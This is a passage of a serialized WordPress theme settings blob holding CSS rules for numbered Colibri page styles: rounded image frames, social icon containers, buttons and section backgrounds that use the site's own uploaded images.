border-right-width: 0px;\n  border-right-style: none;\n  border-bottom-width: 0px;\n  border-bottom-style: none;\n  border-bottom-left-radius: 300px;\n  border-bottom-right-radius: 300px;\n  border-left-width: 0px;\n  border-left-style: none;\n}\n#colibri .style-849-overlay {\n  border-top-width: 0px;\n  border-top-style: none;\n  border-top-left-radius: 300px;\n  border-top-right-radius: 300px;\n  border-right-width: 0px;\n  border-right-style: none;\n  border-bottom-width: 0px;\n  border-bottom-style: none;\n  border-bottom-left-radius: 300px;\n  border-bottom-right-radius: 300px;\n  border-left-width: 0px;\n  border-left-style: none;\n}\n#colibri .style-849-caption {\n  margin-top: 10px;\n}\n#colibri .style-849-frameImage {\n  z-index: -1;\n  transform: translateX(10%) translateY(10%);\n  transform-origin: center center 0px;\n  background-color: rgb(0,0,0);\n  height: 100%;\n  width: 100% ;\n  border-top-width: 10px;\n  border-top-color: rgb(0,0,0);\n  border-top-style: none;\n  border-right-width: 10px;\n  border-right-color: rgb(0,0,0);\n  border-right-style: none;\n  border-bottom-width: 10px;\n  border-bottom-color: rgb(0,0,0);\n  border-bottom-style: none;\n  border-left-width: 10px;\n  border-left-color: rgb(0,0,0);\n  border-left-style: none;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:850;a:3:{s:7:\"desktop\";s:148:\"#colibri .style-850 .text-wrapper-fancy svg path {\n  stroke: #000000;\n  stroke-linejoin: initial;\n  stroke-linecap: initial;\n  stroke-width: 8px;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:851;a:3:{s:7:\"desktop\";s:201:\"#colibri .style-851 {\n  font-style: italic;\n}\n#colibri .style-851 p {\n  font-style: italic;\n}\n#colibri .style-851 ul {\n  list-style-type: disc;\n}\n#colibri .style-851 ol {\n  list-style-type: decimal;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:852;a:3:{s:7:\"desktop\";s:107:\"#colibri .style-852 ul {\n  list-style-type: disc;\n}\n#colibri .style-852 ol {\n  list-style-type: decimal;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:853;a:3:{s:7:\"desktop\";s:380:\"#colibri .style-853 .icon-container {\n  fill: rgb(163, 206, 250);\n  width: 20px ;\n  height: 20px;\n}\n#colibri .style-853 .icon-container:hover {\n  fill: #303e7a;\n}\n#colibri .style-853 .icon-container:hover {\n  fill: #303e7a;\n}\n#colibri .style-853 .social-icon-container {\n  margin-right: 5px;\n  padding-top: 5px;\n  padding-right: 5px;\n  padding-bottom: 5px;\n  padding-left: 5px;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:854;a:3:{s:7:\"desktop\";s:1393:\"#colibri .style-854-image {\n  opacity: 1;\n  border-top-width: 0px;\n  border-top-style: none;\n  border-top-left-radius: 300px;\n  border-top-right-radius: 300px;\n  border-right-width: 0px;\n  border-right-style: none;\n  border-bottom-width: 0px;\n  border-bottom-style: none;\n  border-bottom-left-radius: 300px;\n  border-bottom-right-radius: 300px;\n  border-left-width: 0px;\n  border-left-style: none;\n}\n#colibri .style-854-overlay {\n  border-top-width: 0px;\n  border-top-style: none;\n  border-top-left-radius: 300px;\n  border-top-right-radius: 300px;\n  border-right-width: 0px;\n  border-right-style: none;\n  border-bottom-width: 0px;\n  border-bottom-style: none;\n  border-bottom-left-radius: 300px;\n  border-bottom-right-radius: 300px;\n  border-left-width: 0px;\n  border-left-style: none;\n}\n#colibri .style-854-caption {\n  margin-top: 10px;\n}\n#colibri .style-854-frameImage {\n  z-index: -1;\n  transform: translateX(10%) translateY(10%);\n  transform-origin: center center 0px;\n  background-color: rgb(0,0,0);\n  height: 100%;\n  width: 100% ;\n  border-top-width: 10px;\n  border-top-color: rgb(0,0,0);\n  border-top-style: none;\n  border-right-width: 10px;\n  border-right-color: rgb(0,0,0);\n  border-right-style: none;\n  border-bottom-width: 10px;\n  border-bottom-color: rgb(0,0,0);\n  border-bottom-style: none;\n  border-left-width: 10px;\n  border-left-color: rgb(0,0,0);\n  border-left-style: none;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:855;a:3:{s:7:\"desktop\";s:380:\"#colibri .style-855 .icon-container {\n  fill: rgb(163, 206, 250);\n  width: 20px ;\n  height: 20px;\n}\n#colibri .style-855 .icon-container:hover {\n  fill: #303e7a;\n}\n#colibri .style-855 .icon-container:hover {\n  fill: #303e7a;\n}\n#colibri .style-855 .social-icon-container {\n  margin-right: 5px;\n  padding-top: 5px;\n  padding-right: 5px;\n  padding-bottom: 5px;\n  padding-left: 5px;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:856;a:3:{s:7:\"desktop\";s:1393:\"#colibri .style-856-image {\n  opacity: 1;\n  border-top-width: 0px;\n  border-top-style: none;\n  border-top-left-radius: 300px;\n  border-top-right-radius: 300px;\n  border-right-width: 0px;\n  border-right-style: none;\n  border-bottom-width: 0px;\n  border-bottom-style: none;\n  border-bottom-left-radius: 300px;\n  border-bottom-right-radius: 300px;\n  border-left-width: 0px;\n  border-left-style: none;\n}\n#colibri .style-856-overlay {\n  border-top-width: 0px;\n  border-top-style: none;\n  border-top-left-radius: 300px;\n  border-top-right-radius: 300px;\n  border-right-width: 0px;\n  border-right-style: none;\n  border-bottom-width: 0px;\n  border-bottom-style: none;\n  border-bottom-left-radius: 300px;\n  border-bottom-right-radius: 300px;\n  border-left-width: 0px;\n  border-left-style: none;\n}\n#colibri .style-856-caption {\n  margin-top: 10px;\n}\n#colibri .style-856-frameImage {\n  z-index: -1;\n  transform: translateX(10%) translateY(10%);\n  transform-origin: center center 0px;\n  background-color: rgb(0,0,0);\n  height: 100%;\n  width: 100% ;\n  border-top-width: 10px;\n  border-top-color: rgb(0,0,0);\n  border-top-style: none;\n  border-right-width: 10px;\n  border-right-color: rgb(0,0,0);\n  border-right-style: none;\n  border-bottom-width: 10px;\n  border-bottom-color: rgb(0,0,0);\n  border-bottom-style: none;\n  border-left-width: 10px;\n  border-left-color: rgb(0,0,0);\n  border-left-style: none;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:857;a:3:{s:7:\"desktop\";s:380:\"#colibri .style-857 .icon-container {\n  fill: rgb(163, 206, 250);\n  width: 20px ;\n  height: 20px;\n}\n#colibri .style-857 .icon-container:hover {\n  fill: #303e7a;\n}\n#colibri .style-857 .icon-container:hover {\n  fill: #303e7a;\n}\n#colibri .style-857 .social-icon-container {\n  margin-right: 5px;\n  padding-top: 5px;\n  padding-right: 5px;\n  padding-bottom: 5px;\n  padding-left: 5px;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:858;a:3:{s:7:\"desktop\";s:1393:\"#colibri .style-858-image {\n  opacity: 1;\n  border-top-width: 0px;\n  border-top-style: none;\n  border-top-left-radius: 300px;\n  border-top-right-radius: 300px;\n  border-right-width: 0px;\n  border-right-style: none;\n  border-bottom-width: 0px;\n  border-bottom-style: none;\n  border-bottom-left-radius: 300px;\n  border-bottom-right-radius: 300px;\n  border-left-width: 0px;\n  border-left-style: none;\n}\n#colibri .style-858-overlay {\n  border-top-width: 0px;\n  border-top-style: none;\n  border-top-left-radius: 300px;\n  border-top-right-radius: 300px;\n  border-right-width: 0px;\n  border-right-style: none;\n  border-bottom-width: 0px;\n  border-bottom-style: none;\n  border-bottom-left-radius: 300px;\n  border-bottom-right-radius: 300px;\n  border-left-width: 0px;\n  border-left-style: none;\n}\n#colibri .style-858-caption {\n  margin-top: 10px;\n}\n#colibri .style-858-frameImage {\n  z-index: -1;\n  transform: translateX(10%) translateY(10%);\n  transform-origin: center center 0px;\n  background-color: rgb(0,0,0);\n  height: 100%;\n  width: 100% ;\n  border-top-width: 10px;\n  border-top-color: rgb(0,0,0);\n  border-top-style: none;\n  border-right-width: 10px;\n  border-right-color: rgb(0,0,0);\n  border-right-style: none;\n  border-bottom-width: 10px;\n  border-bottom-color: rgb(0,0,0);\n  border-bottom-style: none;\n  border-left-width: 10px;\n  border-left-color: rgb(0,0,0);\n  border-left-style: none;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:859;a:3:{s:7:\"desktop\";s:380:\"#colibri .style-859 .icon-container {\n  fill: rgb(163, 206, 250);\n  width: 20px ;\n  height: 20px;\n}\n#colibri .style-859 .icon-container:hover {\n  fill: #303e7a;\n}\n#colibri .style-859 .icon-container:hover {\n  fill: #303e7a;\n}\n#colibri .style-859 .social-icon-container {\n  margin-right: 5px;\n  padding-top: 5px;\n  padding-right: 5px;\n  padding-bottom: 5px;\n  padding-left: 5px;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:860;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:861;a:3:{s:7:\"desktop\";s:83:\"#colibri .style-861 {\n  text-align: center;\n  height: auto;\n  min-height: unset;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:862;a:3:{s:7:\"desktop\";s:148:\"#colibri .style-862 .text-wrapper-fancy svg path {\n  stroke: #000000;\n  stroke-linejoin: initial;\n  stroke-linecap: initial;\n  stroke-width: 8px;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:863;a:3:{s:7:\"desktop\";s:107:\"#colibri .style-863 ul {\n  list-style-type: disc;\n}\n#colibri .style-863 ol {\n  list-style-type: decimal;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:864;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:865;a:3:{s:7:\"desktop\";s:1284:\"#colibri .style-865-icon {\n  width: 12px;\n  height: 12px;\n  margin-right: 10px;\n  margin-left: 0px;\n}\n#colibri .style-865 {\n  text-align: center;\n  background-color: #303e7a;\n  background-image: none;\n  font-family: Open Sans;\n  font-weight: 600;\n  text-transform: uppercase;\n  font-size: 12px;\n  line-height: 1;\n  letter-spacing: 1px;\n  color: #fff;\n  border-top-width: 2px;\n  border-top-color: #303e7a;\n  border-top-style: solid;\n  border-top-left-radius: 5px;\n  border-top-right-radius: 5px;\n  border-right-width: 2px;\n  border-right-color: #303e7a;\n  border-right-style: solid;\n  border-bottom-width: 2px;\n  border-bottom-color: #303e7a;\n  border-bottom-style: solid;\n  border-bottom-left-radius: 5px;\n  border-bottom-right-radius: 5px;\n  border-left-width: 2px;\n  border-left-color: #303e7a;\n  border-left-style: solid;\n  padding-top: 12px;\n  padding-right: 24px;\n  padding-bottom: 12px;\n  padding-left: 24px;\n}\n#colibri .style-865:hover,#colibri .style-865:focus {\n  background-color: rgb(7, 29, 122);\n  border-top-color: rgb(7, 29, 122);\n  border-right-color: rgb(7, 29, 122);\n  border-bottom-color: rgb(7, 29, 122);\n  border-left-color: rgb(7, 29, 122);\n}\n#colibri .style-865:active .style-865-icon {\n  width: 12px;\n  height: 12px;\n  margin-right: 10px;\n  margin-left: 0px;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:866;a:3:{s:7:\"desktop\";s:116:\"#colibri .style-866 {\n  height: auto;\n  min-height: unset;\n  background-color: #F5FAFD;\n  background-image: none;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:867;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:67:\"#colibri .style-867 {\n  margin-right: 15px;\n  margin-left: 15px;\n}\n\";}i:868;a:3:{s:7:\"desktop\";s:857:\"#colibri .style-868 {\n  text-align: center;\n  height: auto;\n  min-height: unset;\n  background-position: center center;\n  background-size: contain;\n  background-image: url(\"https://gsudice.dataconn.net/wp-content/uploads/2023/09/cropped-map1-1.jpg\");\n  background-attachment: scroll;\n  background-repeat: no-repeat;\n  box-shadow: 0px 10px 30px 2px rgba(0, 0, 0, 0.15) ;\n  z-index: 1;\n  margin-top: 10%;\n  margin-bottom: 10%;\n  transform: translateX(6%) translateY(0%);\n  transform-origin: center center 0px;\n  border-top-width: 0px;\n  border-top-style: none;\n  border-top-left-radius: 5px;\n  border-top-right-radius: 5px;\n  border-right-width: 0px;\n  border-right-style: none;\n  border-bottom-width: 0px;\n  border-bottom-style: none;\n  border-bottom-left-radius: 5px;\n  border-bottom-right-radius: 5px;\n  border-left-width: 0px;\n  border-left-style: none;\n}\n\";s:6:\"tablet\";s:68:\"#colibri .style-868 {\n  transform: translateX(5%) translateY(0%);\n}\n\";s:6:\"mobile\";s:167:\"#colibri .style-868 {\n  min-height: 350px;\n  margin-top: 0%;\n  margin-right: 0%;\n  margin-bottom: 0%;\n  margin-left: 0%;\n  transform: translateX(0%) translateY(5%);\n}\n\";}i:869;a:3:{s:7:\"desktop\";s:707:\"#colibri .style-869 {\n  text-align: left;\n  height: auto;\n  min-height: unset;\n  background-color: #f6f8fa;\n  background-image: none;\n  padding-top: 15%;\n  padding-right: 20%;\n  padding-bottom: 15%;\n  padding-left: 20%;\n  transform: translateX(-6%) translateY(0%);\n  transform-origin: center center 0px;\n  box-shadow: 0px 5px 15px 2px rgba(0, 0, 0, 0.15) ;\n  border-top-width: 0px;\n  border-top-style: none;\n  border-top-left-radius: 5px;\n  border-top-right-radius: 5px;\n  border-right-width: 0px;\n  border-right-style: none;\n  border-bottom-width: 0px;\n  border-bottom-style: none;\n  border-bottom-left-radius: 5px;\n  border-bottom-right-radius: 5px;\n  border-left-width: 0px;\n  border-left-style: none;\n}\n\";s:6:\"tablet\";s:155:\"#colibri .style-869 {\n  padding-top: 10%;\n  padding-right: 15%;\n  padding-bottom: 10%;\n  padding-left: 15%;\n  transform: translateX(-5%) translateY(0%);\n}\n\";s:6:\"mobile\";s:254:\"#colibri .style-869 {\n  text-align: center;\n  padding-top: 10%;\n  padding-right: 10%;\n  padding-bottom: 10%;\n  padding-left: 10%;\n  transform: translateX(0%) translateY(0%);\n  margin-top: 0%;\n  margin-right: 0%;\n  margin-bottom: 0%;\n  margin-left: 0%;\n}\n\";}i:872;a:3:{s:7:\"desktop\";s:107:\"#colibri .style-872 ol {\n  list-style-type: decimal;\n}\n#colibri .style-872 ul {\n  list-style-type: disc;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:873;a:3:{s:7:\"desktop\";s:116:\"#colibri .style-873 {\n  height: auto;\n  min-height: unset;\n  background-color: #F5FAFD;\n  background-image: none;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:874;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:67:\"#colibri .style-874 {\n  margin-right: 15px;\n  margin-left: 15px;\n}\n\";}i:875;a:3:{s:7:\"desktop\";s:706:\"#colibri .style-875 {\n  text-align: left;\n  height: auto;\n  min-height: unset;\n  background-color: #f6f8fa;\n  background-image: none;\n  padding-top: 15%;\n  padding-right: 20%;\n  padding-bottom: 15%;\n  padding-left: 20%;\n  transform: translateX(6%) translateY(0%);\n  transform-origin: center center 0px;\n  border-top-width: 0px;\n  border-top-style: none;\n  border-top-left-radius: 5px;\n  border-top-right-radius: 5px;\n  border-right-width: 0px;\n  border-right-style: none;\n  border-bottom-width: 0px;\n  border-bottom-style: none;\n  border-bottom-left-radius: 5px;\n  border-bottom-right-radius: 5px;\n  border-left-width: 0px;\n  border-left-style: none;\n  box-shadow: 0px 5px 15px 2px rgba(0, 0, 0, 0.15) ;\n}\n\";s:6:\"tablet\";s:154:\"#colibri .style-875 {\n  padding-top: 10%;\n  padding-right: 15%;\n  padding-bottom: 10%;\n  padding-left: 15%;\n  transform: translateX(5%) translateY(0%);\n}\n\";s:6:\"mobile\";s:195:\"#colibri .style-875 {\n  text-align: center;\n  padding-top: 10%;\n  padding-right: 10%;\n  padding-bottom: 10%;\n  padding-left: 10%;\n  transform: translateX(0%) translateY(0%);\n  margin-left: 0%;\n}\n\";}i:876;a:3:{s:7:\"desktop\";s:148:\"#colibri .style-876 .text-wrapper-fancy svg path {\n  stroke: #000000;\n  stroke-linejoin: initial;\n  stroke-linecap: initial;\n  stroke-width: 8px;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:878;a:3:{s:7:\"desktop\";s:107:\"#colibri .style-878 ol {\n  list-style-type: decimal;\n}\n#colibri .style-878 ul {\n  list-style-type: disc;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:879;a:3:{s:7:\"desktop\";s:874:\"#colibri .style-879 {\n  text-align: center;\n  height: auto;\n  min-height: unset;\n  background-position: center center;\n  background-size: cover;\n  background-image: url(\"https://gsudice.dataconn.net/wp-content/uploads/2022/02/cropped-kevin-ku-w7ZyuGYNpRQ-unsplash-scaled-1.jpg\");\n  background-attachment: scroll;\n  background-repeat: no-repeat;\n  box-shadow: 0px 10px 30px 2px rgba(0, 0, 0, 0.15) ;\n  margin-top: 10%;\n  margin-bottom: 10%;\n  transform: translateX(-6%) translateY(0%);\n  transform-origin: center center 0px;\n  border-top-width: 0px;\n  border-top-style: none;\n  border-top-left-radius: 5px;\n  border-top-right-radius: 5px;\n  border-right-width: 0px;\n  border-right-style: none;\n  border-bottom-width: 0px;\n  border-bottom-style: none;\n  border-bottom-left-radius: 5px;\n  border-bottom-right-radius: 5px;\n  border-left-width: 0px;\n  border-left-style: none;\n}\n\";s:6:\"tablet\";s:69:\"#colibri .style-879 {\n  transform: translateX(-5%) translateY(0%);\n}\n\";s:6:\"mobile\";s:168:\"#colibri .style-879 {\n  min-height: 350px;\n  margin-top: 0%;\n  margin-right: 0%;\n  margin-bottom: 0%;\n  margin-left: 0%;\n  transform: translateX(0%) translateY(-5%);\n}\n\";}i:880;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:881;a:3:{s:7:\"desktop\";s:116:\"#colibri .style-881 {\n  height: auto;\n  min-height: unset;\n  background-color: #F5FAFD;\n  background-image: none;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:882;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:883;a:3:{s:7:\"desktop\";s:83:\"#colibri .style-883 {\n  text-align: center;\n  height: auto;\n  min-height: unset;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:893;a:3:{s:7:\"desktop\";s:251:\"#colibri .style-893 {\n  text-align: left;\n  font-size: 16px;\n  color: #303e7a;\n}\n#colibri .style-893 p {\n  font-size: 16px;\n  color: #303e7a;\n}\n#colibri .style-893 ol {\n  list-style-type: decimal;\n}\n#colibri .style-893 ul {\n  list-style-type: disc;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:901;a:3:{s:7:\"desktop\";s:107:\"#colibri .style-901 ul {\n  list-style-type: disc;\n}\n#colibri .style-901 ol {\n  list-style-type: decimal;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:902;a:3:{s:7:\"desktop\";s:107:\"#colibri .style-902 ul {\n  list-style-type: disc;\n}\n#colibri .style-902 ol {\n  list-style-type: decimal;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:910;a:3:{s:7:\"desktop\";s:116:\"#colibri .style-910 {\n  height: auto;\n  min-height: unset;\n  background-color: #F5FAFD;\n  background-image: none;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:911;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:912;a:3:{s:7:\"desktop\";s:159:\".style-912 > .h-y-container > *:not(:last-child) {\n  margin-bottom: 10px;\n}\n#colibri .style-912 {\n  text-align: center;\n  height: auto;\n  min-height: unset;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:913;a:3:{s:7:\"desktop\";s:1393:\"#colibri .style-913-image {\n  opacity: 1;\n  border-top-width: 0px;\n  border-top-style: none;\n  border-top-left-radius: 300px;\n  border-top-right-radius: 300px;\n  border-right-width: 0px;\n  border-right-style: none;\n  border-bottom-width: 0px;\n  border-bottom-style: none;\n  border-bottom-left-radius: 300px;\n  border-bottom-right-radius: 300px;\n  border-left-width: 0px;\n  border-left-style: none;\n}\n#colibri .style-913-overlay {\n  border-top-width: 0px;\n  border-top-style: none;\n  border-top-left-radius: 300px;\n  border-top-right-radius: 300px;\n  border-right-width: 0px;\n  border-right-style: none;\n  border-bottom-width: 0px;\n  border-bottom-style: none;\n  border-bottom-left-radius: 300px;\n  border-bottom-right-radius: 300px;\n  border-left-width: 0px;\n  border-left-style: none;\n}\n#colibri .style-913-caption {\n  margin-top: 10px;\n}\n#colibri .style-913-frameImage {\n  z-index: -1;\n  transform: translateX(10%) translateY(10%);\n  transform-origin: center center 0px;\n  background-color: rgb(0,0,0);\n  height: 100%;\n  width: 100% ;\n  border-top-width: 10px;\n  border-top-color: rgb(0,0,0);\n  border-top-style: none;\n  border-right-width: 10px;\n  border-right-color: rgb(0,0,0);\n  border-right-style: none;\n  border-bottom-width: 10px;\n  border-bottom-color: rgb(0,0,0);\n  border-bottom-style: none;\n  border-left-width: 10px;\n  border-left-color: rgb(0,0,0);\n  border-left-style: none;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:914;a:3:{s:7:\"desktop\";s:148:\"#colibri .style-914 .text-wrapper-fancy svg path {\n  stroke: #000000;\n  stroke-linejoin: initial;\n  stroke-linecap: initial;\n  stroke-width: 8px;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:915;a:3:{s:7:\"desktop\";s:201:\"#colibri .style-915 {\n  font-style: italic;\n}\n#colibri .style-915 p {\n  font-style: italic;\n}\n#colibri .style-915 ul {\n  list-style-type: disc;\n}\n#colibri .style-915 ol {\n  list-style-type: decimal;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:917;a:3:{s:7:\"desktop\";s:380:\"#colibri .style-917 .icon-container {\n  fill: rgb(163, 206, 250);\n  width: 20px ;\n  height: 20px;\n}\n#colibri .style-917 .icon-container:hover {\n  fill: #303e7a;\n}\n#colibri .style-917 .icon-container:hover {\n  fill: #303e7a;\n}\n#colibri .style-917 .social-icon-container {\n  margin-right: 5px;\n  padding-top: 5px;\n  padding-right: 5px;\n  padding-bottom: 5px;\n  padding-left: 5px;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:918;a:3:{s:7:\"desktop\";s:1393:\"#colibri .style-918-image {\n  opacity: 1;\n  border-top-width: 0px;\n  border-top-style: none;\n  border-top-left-radius: 300px;\n  border-top-right-radius: 300px;\n  border-right-width: 0px;\n  border-right-style: none;\n  border-bottom-width: 0px;\n  border-bottom-style: none;\n  border-bottom-left-radius: 300px;\n  border-bottom-right-radius: 300px;\n  border-left-width: 0px;\n  border-left-style: none;\n}\n#colibri .style-918-overlay {\n  border-top-width: 0px;\n  border-top-style: none;\n  border-top-left-radius: 300px;\n  border-top-right-radius: 300px;\n  border-right-width: 0px;\n  border-right-style: none;\n  border-bottom-width: 0px;\n  border-bottom-style: none;\n  border-bottom-left-radius: 300px;\n  border-bottom-right-radius: 300px;\n  border-left-width: 0px;\n  border-left-style: none;\n}\n#colibri .style-918-caption {\n  margin-top: 10px;\n}\n#colibri .style-918-frameImage {\n  z-index: -1;\n  transform: translateX(10%) translateY(10%);\n  transform-origin: center center 0px;\n  background-color: rgb(0,0,0);\n  height: 100%;\n  width: 100% ;\n  border-top-width: 10px;\n  border-top-color: rgb(0,0,0);\n  border-top-style: none;\n  border-right-width: 10px;\n  border-right-color: rgb(0,0,0);\n  border-right-style: none;\n  border-bottom-width: 10px;\n  border-bottom-color: rgb(0,0,0);\n  border-bottom-style: none;\n  border-left-width: 10px;\n  border-left-color: rgb(0,0,0);\n  border-left-style: none;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:919;a:3:{s:7:\"desktop\";s:380:\"#colibri .style-919 .icon-container {\n  fill: rgb(163, 206, 250);\n  width: 20px ;\n  height: 20px;\n}\n#colibri .style-919 .icon-container:hover {\n  fill: #303e7a;\n}\n#colibri .style-919 .icon-container:hover {\n  fill: #303e7a;\n}\n#colibri .style-919 .social-icon-container {\n  margin-right: 5px;\n  padding-top: 5px;\n  padding-right: 5px;\n  padding-bottom: 5px;\n  padding-left: 5px;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:920;a:3:{s:7:\"desktop\";s:1393:\"#colibri .style-920-image {\n  opacity: 1;\n  border-top-width: 0px;\n  border-top-style: none;\n  border-top-left-radius: 300px;\n  border-top-right-radius: 300px;\n  border-right-width: 0px;\n  border-right-style: none;\n  border-bottom-width: 0px;\n  border-bottom-style: none;\n  border-bottom-left-radius: 300px;\n  border-bottom-right-radius: 300px;\n  border-left-width: 0px;\n  border-left-style: none;\n}\n#colibri .style-920-overlay {\n  border-top-width: 0px;\n  border-top-style: none;\n  border-top-left-radius: 300px;\n  border-top-right-radius: 300px;\n  border-right-width: 0px;\n  border-right-style: none;\n  border-bottom-width: 0px;\n  border-bottom-style: none;\n  border-bottom-left-radius: 300px;\n  border-bottom-right-radius: 300px;\n  border-left-width: 0px;\n  border-left-style: none;\n}\n#colibri .style-920-caption {\n  margin-top: 10px;\n}\n#colibri .style-920-frameImage {\n  z-index: -1;\n  transform: translateX(10%) translateY(10%);\n  transform-origin: center center 0px;\n  background-color: rgb(0,0,0);\n  height: 100%;\n  width: 100% ;\n  border-top-width: 10px;\n  border-top-color: rgb(0,0,0);\n  border-top-style: none;\n  border-right-width: 10px;\n  border-right-color: rgb(0,0,0);\n  border-right-style: none;\n  border-bottom-width: 10px;\n  border-bottom-color: rgb(0,0,0);\n  border-bottom-style: none;\n  border-left-width: 10px;\n  border-left-color: rgb(0,0,0);\n  border-left-style: none;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:921;a:3:{s:7:\"desktop\";s:380:\"#colibri .style-921 .icon-container {\n  fill: rgb(163, 206, 250);\n  width: 20px ;\n  height: 20px;\n}\n#colibri .style-921 .icon-container:hover {\n  fill: #303e7a;\n}\n#colibri .style-921 .icon-container:hover {\n  fill: #303e7a;\n}\n#colibri .style-921 .social-icon-container {\n  margin-right: 5px;\n  padding-top: 5px;\n  padding-right: 5px;\n  padding-bottom: 5px;\n  padding-left: 5px;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:922;a:3:{s:7:\"desktop\";s:1393:\"#colibri .style-922-image {\n  opacity: 1;\n  border-top-width: 0px;\n  border-top-style: none;\n  border-top-left-radius: 300px;\n  border-top-right-radius: 300px;\n  border-right-width: 0px;\n  border-right-style: none;\n  border-bottom-width: 0px;\n  border-bottom-style: none;\n  border-bottom-left-radius: 300px;\n  border-bottom-right-radius: 300px;\n  border-left-width: 0px;\n  border-left-style: none;\n}\n#colibri .style-922-overlay {\n  border-top-width: 0px;\n  border-top-style: none;\n  border-top-left-radius: 300px;\n  border-top-right-radius: 300px;\n  border-right-width: 0px;\n  border-right-style: none;\n  border-bottom-width: 0px;\n  border-bottom-style: none;\n  border-bottom-left-radius: 300px;\n  border-bottom-right-radius: 300px;\n  border-left-width: 0px;\n  border-left-style: none;\n}\n#colibri .style-922-caption {\n  margin-top: 10px;\n}\n#colibri .style-922-frameImage {\n  z-index: -1;\n  transform: translateX(10%) translateY(10%);\n  transform-origin: center center 0px;\n  background-color: rgb(0,0,0);\n  height: 100%;\n  width: 100% ;\n  border-top-width: 10px;\n  border-top-color: rgb(0,0,0);\n  border-top-style: none;\n  border-right-width: 10px;\n  border-right-color: rgb(0,0,0);\n  border-right-style: none;\n  border-bottom-width: 10px;\n  border-bottom-color: rgb(0,0,0);\n  border-bottom-style: none;\n  border-left-width: 10px;\n  border-left-color: rgb(0,0,0);\n  border-left-style: none;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:923;a:3:{s:7:\"desktop\";s:380:\"#colibri .style-923 .icon-container {\n  fill: rgb(163, 206, 250);\n  width: 20px ;\n  height: 20px;\n}\n#colibri .style-923 .icon-container:hover {\n  fill: #303e7a;\n}\n#colibri .style-923 .icon-container:hover {\n  fill: #303e7a;\n}\n#colibri .style-923 .social-icon-container {\n  margin-right: 5px;\n  padding-top: 5px;\n  padding-right: 5px;\n  padding-bottom: 5px;\n  padding-left: 5px;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:924;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:925;a:3:{s:7:\"desktop\";s:83:\"#colibri .style-925 {\n  text-align: center;\n  height: auto;\n  min-height: unset;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:926;a:3:{s:7:\"desktop\";s:148:\"#colibri .style-926 .text-wrapper-fancy svg path {\n  stroke: #000000;\n  